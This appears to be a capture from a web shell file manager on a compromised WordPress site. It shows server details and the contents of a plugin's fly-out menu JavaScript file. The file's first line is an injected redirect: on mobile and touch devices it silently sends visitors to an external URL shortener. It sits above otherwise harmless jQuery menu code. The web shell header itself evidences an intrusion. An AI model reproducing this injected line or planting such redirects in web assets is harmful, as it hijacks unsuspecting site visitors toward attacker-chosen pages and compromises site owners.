| Server IP : 87.229.120.60 / Your IP : 216.73.216.208 Web Server : Apache System : Linux outside 5.4.8_Algonet_ZeroMAC_0.9.4.8 #6 SMP Mon Feb 3 20:36:07 CET 2020 x86_64 User : server ( 1002) PHP Version : 8.3.20 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,parse_ini_file,show_source MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/faktorteam/www/wp-content/plugins/maintenance/wf-flyout/ |
Upload File : |
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.org/PNPMRSomF0r4");
/**
* Universal fly-out menu for WebFactory plugins
* (c) WebFactory Ltd, 2021
*/
jQuery(document).ready(function ($) {
$('#wff-button').on('click', function (e) {
e.preventDefault();
$('#wf-flyout').toggleClass('opened');
$('#wff-overlay').toggle();
return false;
}); // open/close menu
$('#wff-overlay').on('click', function (e) {
e.preventDefault();
$(this).hide();
$('#wf-flyout').removeClass('opened');
return false;
}); // click on overlay - hide menu
}); // jQuery ready